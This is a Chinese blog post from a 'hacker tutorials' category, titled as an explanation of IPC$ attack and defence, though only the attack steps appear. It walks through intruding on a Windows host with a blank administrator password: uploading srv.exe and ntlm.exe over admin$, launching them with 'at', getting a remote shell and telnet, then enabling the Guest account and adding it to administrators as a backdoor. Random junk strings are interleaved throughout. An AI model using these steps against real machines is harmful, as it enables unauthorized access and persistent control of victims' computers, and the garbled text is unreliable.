注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

傲气狂龙

文能起笔安天下,武能马上定乾坤,狂龙一出,谁与争锋。

 
 
 

日志

 
 
关于我

人只有张扬着野性,才不甘于沉沦。野性就是要有梦想,甚至是异想天开。人类就是在异想天开中进步的。

网易考拉推荐

详解IPC$攻击及防御  

2008-03-21 19:26:58|  分类: 黑客教程 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
详解IPC$攻击及防御
 这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 %jB]|({/ki 
0gFk c 
  2. C:\>copy srv.exe \\127.0.0.1\admin$ z- P*]=Nm 
]6L| OCHh 
  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 e`Wsx6z 
r5`Y,b|z 
  3. C:\>net time \\127.0.0.1 =b3i1eYA88 
PT(_O^p 
  查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 @ hW-[f 
k&-5"C_ 
  4. C:\>at \\127.0.0.1 11:05 srv.exe  u' $p 
&!D}M> ^ 
  用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) _.@\|%{ 
=~bY}}( 
  5. C:\>net time \\127.0.0.1 5Tg/ U 
nA7>(<A[ 
  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。 wam|7 W 
$M owO$ 
  6. C:\>telnet 127.0.0.1 99 9@k?VN(G 
v W NR 
  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 9R Q+f\E 
[+e]!/fB 
  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 2oT "/m 
3:n+/M=d 
  7.C:\>copy ntlm.exe \\127.0.0.1\admin$ o`_,MND1_{ 
Wx c :j 
  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。  C"7g3j!n 
|)0rvf) 
  8. C:\WINNT\system32>ntlm 3m%6@V53#5 
Gd]"j8 
  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! {4W:/0 h- 
[n6z^V 
  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) tE4MKxN 
e{X;CU{ 
  为了以防万一,我们再把guest激活加到管理组 SWI^xN 
w]!Z!S7dK 
  10. C:\>net user guest /active:yes Y!z ;c2P) 
rO eSR D 
  将对方的Guest用户激活 C[i]Pc;qC 
U0x+?{G 
  11. C:\>net user guest 1234 B>0^4+ 
"= - t 
  将Guest的密码改为1234,或者你要设定的密码 zw1^&~8x. 
v;}9nbN' 
  12. C:\>net localgroup administrators guest /add E6[>D>&C 
.vei}Ps 
  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) io?m, 
otfwp 
  十 总结: {~UZ/:Hm 
Ijk_^xzQ7 
  关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论。 H~dGQ 8&\I
  评论这张
 
阅读(137)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017